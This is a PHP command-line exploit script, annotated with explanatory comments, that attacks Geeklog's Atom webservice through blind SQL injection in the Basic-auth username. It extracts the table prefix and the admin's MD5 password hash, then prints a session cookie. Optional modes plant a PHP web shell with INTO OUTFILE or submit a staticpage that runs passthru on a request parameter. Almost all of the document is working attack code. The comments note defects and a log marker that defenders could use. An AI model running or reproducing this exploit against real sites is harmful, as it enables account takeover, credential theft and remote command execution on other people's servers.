<?php
// Environment guards: the script refuses to run outside the CLI SAPI and
// requires the curl extension, since every request below goes through curl.
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
// Choose the shared-library name from the first three letters of PHP_OS.
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
// Try to load curl at runtime with dl(). Note that `nil` is not a PHP
// constant, so the "success" arm of each ternary is an undefined-constant
// reference rather than a no-op.
!dl("php_curl.dll") ? die($err[1]) :
nil;
} else {
!dl("php_curl.so") ? die($err[1]) :
nil;
}
}
/**
 * Print the command-line usage text and exit.
 *
 * Note: $argv is read without a `global` declaration, so inside this function
 * it is undefined and the "php " prefix is followed by an empty script name.
 * The trailing backslashes inside the string literals are line-wrap artefacts
 * of the listing, not PHP escapes.
 */
function syntax() {
print (
"Syntax: php ".$argv[0]." [host] [path] [OPTIONS] \n". "Options: \
\n". "--port:[port] - specify a port \
\n". " default->80 \
\n". "--prefix - try to extract table prefix from information.schema \
\n". " default->gl_ \
\n". "--uid:[n] - specify an uid other than default (2,usually admin) \
\n". "--proxy:[host:port] - use proxy \
\n". "--skiptest - skip preliminary tests \
\n". "--test - run only tests \
\n". "--export_shell:[path] - try to export a shell with INTO OUTFILE, needs \
Mysql\n". " FILE privilege \
\n". "--sp - submit a 'staticpage' with php code, needs geeklog \
\n". " sp_php permission set to true for thestaticpage \
\n". " plugin (not the default) \
\n". "Examples: php ".$argv[0]." 192.168.0.1 /geeklog/ \
\n". " php ".$argv[0]." 192.168.0.1 / --prefix --proxy:1.1.1.1:8080 \
\n". " php ".$argv[0]." 192.168.0.1 / --prefix \
--export_shell:/var/www\n". " php ".$argv[0]." 192.168.0.1 / --prefix \
--uid:3"); die();
}
// Notices are silenced; several variables below ($null_f, $_o, $proxy_host ...)
// are read before being assigned and rely on that.
error_reporting(E_ALL ^ E_NOTICE);
// Positional arguments: target host and the web path of the Geeklog install.
$host = $argv[1];
$path = $argv[2];
$prefix = "gl_";
// default: the stock Geeklog table prefix (see the usage text)
$uid = "2";
$where = "uid=$uid";
// Without a path argument there is nothing to do: show usage and exit.
$argv[2] ? print("[*] Attacking...\n") :
syntax();
$_f_prefix = false;
$_use_proxy = false;
$port = 80;
$_skiptest = false;
$_verbose = false;
$_test = false;
$sp_submit = false;
$into_outfile = false;
// Option parsing. Each flag is recognised with stristr(), i.e. a case-insensitive
// substring test, and "--name:value" options are split on ':' afterwards, so
// values containing ':' (e.g. a Windows drive path) would be truncated.
for ($i = 3; $i < $argc; $i++) {
if (stristr($argv[$i], "--prefix")) {
$_f_prefix = true;
}
if (stristr($argv[$i], "--proxy:")) {
// --proxy:host:port -> explode gives [flag, host, port]
$_use_proxy = true;
$tmp = explode(":", $argv[$i]);
$proxy_host = $tmp[1];
$proxy_port = (int)$tmp[2];
}
if (stristr($argv[$i], "--port:")) {
$tmp = explode(":", $argv[$i]);
$port = (int)$tmp[1];
}
if (stristr($argv[$i], "--uid")) {
// Overrides the default uid and the WHERE clause used by the hash loop.
$tmp = explode(":", $argv[$i]);
$uid = (int)$tmp[1];
$where = "uid=$uid";
}
if (stristr($argv[$i], "--verbose")) {
// Parsed but never consulted elsewhere in this listing.
$_verbose = true;
}
if (stristr($argv[$i], "--skiptest")) {
$_skiptest = true;
}
if (stristr($argv[$i], "--test")) {
$_test = true;
}
if (stristr($argv[$i], "--export_shell:")) {
$tmp = explode(":", $argv[$i]);
$my_path = $tmp[1];
$into_outfile = true;
}
if (stristr($argv[$i], "--sp")) {
$sp_submit = true;
}
}
/**
 * Issue one HTTP request through curl and return the response.
 *
 * @param string $url      target URL
 * @param string $auth     base64 "user:pass" value; when non-empty it is sent as an
 *                         "Authorization: Basic ..." header and, because CURLOPT_HEADER
 *                         is then enabled, the response headers are part of the result
 * @param bool   $is_post  send $request as a POST body instead of a GET
 * @param string $request  POST body; a CRLF is appended
 * @return string|false    curl_exec() result; the process exits on a curl error
 *
 * Proxy settings come from the script-level $_use_proxy/$proxy_host/$proxy_port.
 * CURLOPT_TIMEOUT is 0, i.e. no transfer timeout. The fixed Firefox 3.0.7 /
 * Windows NT 5.1 User-Agent is a constant request fingerprint. Every probe in this
 * script arrives as the username half of the Basic-auth credential, so the SQL text
 * is base64-encoded inside the Authorization header rather than in the URL or body.
 */
function _s($url, $auth, $is_post, $request) {
global $_use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; \
it; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"); curl_setopt($ch, CURLOPT_TIMEOUT, \
0);
if ($auth <> "") {
// $auth is rebound from the credential string to the header array for curl.
$auth = array("Authorization: Basic ".$auth);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $auth);
}
if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
// Exits without curl_close(); the handle is only released at process exit.
die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return $_d;
}
/**
 * Recover the table prefix character by character from information_schema.TABLES,
 * using the application's SQL-error page as a boolean oracle (see chk_err).
 *
 * The hex literal 0x25747261636b6261636b636f646573 decodes to '%trackbackcodes', so
 * the row used is the "<prefix>trackbackcodes" table. Characters are read from the
 * end of TABLE_NAME backwards: SUBSTR with a negative position, $j starting at -15,
 * i.e. the character immediately before "trackbackcodes". When the position runs
 * past the start of the name SUBSTR yields '' and ASCII('') is 0, which ends the
 * extraction.
 *
 * Uses the script-level $uid, $pwd and $url; $host, $port and $path are declared
 * global but never read here. $null_f is never initialised, so the outer loop
 * depends on an undefined variable evaluating as false.
 *
 * @return string the extracted prefix; the process exits if information_schema
 *                cannot be queried
 */
function find_prefix() {
global $host, $port, $path, $uid, $pwd, $url;
$_tn = "TABLE_NAME";
$_ift = "information_schema.TABLES";
$_table_prefix = "";
$j = -15;
// Availability check: an error page here means information_schema is not
// reachable through the injection point.
$usr = "' AND 0 UNION SELECT null,null,null,null FROM $_ift WHERE ".$_tn." \
LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, ""); if (chk_err($_o)) {
die("[!] $_ift not availiable.");
} else {
print "[*] Initiating table prefix extraction...\n";
}
while (!$null_f) {
// Binary search over the byte range [mn, mx] for the character at position $j.
$mn = 0x00;
$mx = 0xff;
while (1) {
// Midpoint rounded down (round() would round .5 up, hence the odd/even split).
if (($mx + $mn) % 2 == 1) {
$c = round(($mx + $mn) / 2) - 1;
} else {
$c = round(($mx + $mn) / 2);
}
// CASE yields '' (an SQL error in the numeric uid column) when the byte is >= $c,
// so an error response means "at least $c".
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN \
(ASCII(SUBSTR(".$_tn." FROM $j FOR 1)) >= ".$c.") THEN '' ELSE $uid END) FROM $_ift \
WHERE ".$_tn." LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, "");
if (chk_err($_o)) {
$mn = $c;
} else {
$mx = $c - 1;
}
if (($mx-$mn == 1) or ($mx == $mn)) {
// Range collapsed: the same probe is sent once more to pick mn or mx.
// A resulting byte of 0 marks the beginning of the table name.
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN \
(ASCII(SUBSTR(".$_tn." FROM $j FOR 1)) >= ".$c.") THEN '' ELSE $uid END) FROM $_ift \
WHERE ".$_tn." LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, ""); if (chk_err($_o)) {
if ($mn <> 0) {
// Prepend, since the name is being read right-to-left.
$_table_prefix = chr($mn).$_table_prefix;
} else {
$null_f = true;
}
} else {
if ($mx <> 0) {
$_table_prefix = chr($mx).$_table_prefix;
} else {
$null_f = true;
}
}
if (!$null_f) {
print ("[?] Table prefix->[??]".$_table_prefix."\n");
}
break;
}
}
$j--;
}
print "[?] Table prefix->".$_table_prefix."\n";
return $_table_prefix;
}
/**
 * Attempt to write a one-line PHP file to "$my_path/sh.php" with
 * SELECT ... INTO OUTFILE. The file is written by the database server process,
 * so it needs the MySQL FILE privilege and a directory that server can write to
 * (see the usage text). Only the error page is checked: "[*] Done." means no SQL
 * error came back, not that the file exists or is reachable over HTTP.
 *
 * Uses the script-level $pwd, $url, $prefix and $my_path (from --export_shell:).
 */
function export_sh() {
global $pwd, $url, $prefix, $my_path;
$usr = "' AND 0 UNION SELECT null,'<?php passtrhu(\$_GET[cmd]);?>',null,null \
INTO OUTFILE '".$my_path."/sh.php' FROM ".$prefix."users LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, ""); if (chk_err($_o)) {
print ("[*] Sql error.");
} else {
print ("[*] Done.");
}
}
/**
 * Submit a staticpages entry through the Atom webservice with sp_php set to 1,
 * so that the page body is treated as PHP. This only takes effect when the
 * staticpages plugin grants the sp_php permission (see the usage text).
 *
 * The injected credential selects a row for $uid; the Atom entry is POSTed with
 * a random numeric id. The result check reads $_o, which this function never
 * assigns — the response is stored in $out — so the "Done!" branch is reached
 * whenever the request itself completes. $url is a local here, built from the
 * script-level $host, $port and $path.
 */
function sp_php() {
global $host, $port, $path, $pwd, $prefix, $uid;
srand(make_seed());
$id = rand(0x1, 0xffffff);
echo "[*] id->".$id."\n";
$sh = "passthru(\$_GET[cmd]);";
// Always specify the namespace URI on each element.
// If the staticpages.PHP permission is not available, sp_php is reset to 0 on
// the server side.
$data = "<?xml version=\"1.0\"?>". "<entry>". "<title term=\"1\" \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">\x20\x20\x20\x20</title>". "<id \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">$id</id>". "<sp_content \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">$sh</sp_content>". "<sp_php \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</sp_php>". "<gl_etag \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</gl_etag>". "</entry>";
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,$uid FROM ".$prefix."users \
LIMIT 1/*";
$url = "http://$host:$port".$path."webservices/atom/index.php?plugin=staticpag \
es"; $out = _s($url, base64_encode($usr.":".$pwd) , 1, $data);
if (chk_err($_o)) {
print ("[*] Sql error.");
} else {
print ("[*] Done! \
Visit->http://$host:$port".$path."staticpages/index.php?page=$id&cmd=ls%20-la"); }
}
/**
 * Derive a seed for srand() from the current wall-clock time.
 *
 * microtime() returns "usec sec"; the whole seconds are combined with the
 * scaled microsecond fraction so two calls within one second still differ.
 *
 * @return float
 */
function make_seed() {
$parts = explode(' ', microtime());
$seconds = (float) $parts[1];
$micros = (float) $parts[0];
return $seconds + $micros * 100000;
}
/**
 * Response oracle: true when the body contains the application's error text
 * "An SQL error has occurred." (written below as hex escapes; the stray "\ "
 * between \x75 and x72 is a line-wrap artefact of the listing).
 *
 * Uses the truthiness of stripos(), so a match at offset 0 would be reported
 * as false. Every blind probe in this script is decided by this one phrase,
 * which makes it a useful marker when reviewing application and web-server
 * logs for this kind of activity.
 *
 * @param string $s response body, possibly with headers (see _s)
 * @return bool
 */
function chk_err($s) {
if (stripos ($s, \
"\x41\x6e\x20\x53\x51\x4c\x20\x65\x72\x72\x6f\x72\x20\x68\x61\x73\x20\x6f\x63\x63\x75\ \
x72\x72\x65\x64\x2e")) { return true;
} else {
return false;
}
}
// Main flow. $pwd is the fixed password half of every injected credential; the
// injection point is the Basic-auth username accepted by the Atom webservice
// endpoint below.
$pwd = "AAAA";
$url = "http://$host:$port".$path."webservices/atom/index.php?plugin=staticpages"; \
if (!$_skiptest) {
// Preliminary test: a lone quote as the username. An SQL error page in the
// response is taken as "vulnerable"; anything else aborts.
$out = _s($url, base64_encode("':'") , 0, "");
if (chk_err($out)) {
print("[*] Vulnerable!\n");
} else {
die("[!] Not vulnerable.");
}
}
if ($_test) {
die;
}
if ($_f_prefix == true) {
$prefix = find_prefix();
}
if ($into_outfile == true) {
export_sh();
die;
}
if ($sp_submit == true) {
sp_php();
die;
}
// Candidate alphabet: ASCII '0'-'9' and 'a'-'f', the characters of a hex MD5.
$c = array();
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
$_hash = "";
print ("[*] Initiating hash extraction ...\n");
// 32 hash positions; for each, the 0..255 loop only sends a request for the
// 16 hex candidates, so at most 16 requests per position (512 in total).
for ($j = 1; $j < 0x21; $j++) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
// The uid column is MEDIUMINT: placing '' in it raises an SQL error while
// the numeric $uid does not, so the error page doubles as a true/false
// answer for each probe (the original note adds that this also bypasses
// the speed limit).
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(passwd \
FROM $j FOR 1))=$i) THEN '' ELSE $uid END) FROM ".$prefix."users WHERE $where LIMIT \
1/*"; $out = _s($url, base64_encode($usr.":".$pwd) , 0, "");
if (chk_err($out)) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
break;
}
}
}
// No candidate matched at this position: the oracle is not behaving as expected.
if ($f == false) {
die("\n[!] Unknown error ...");
}
}
print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n";
?>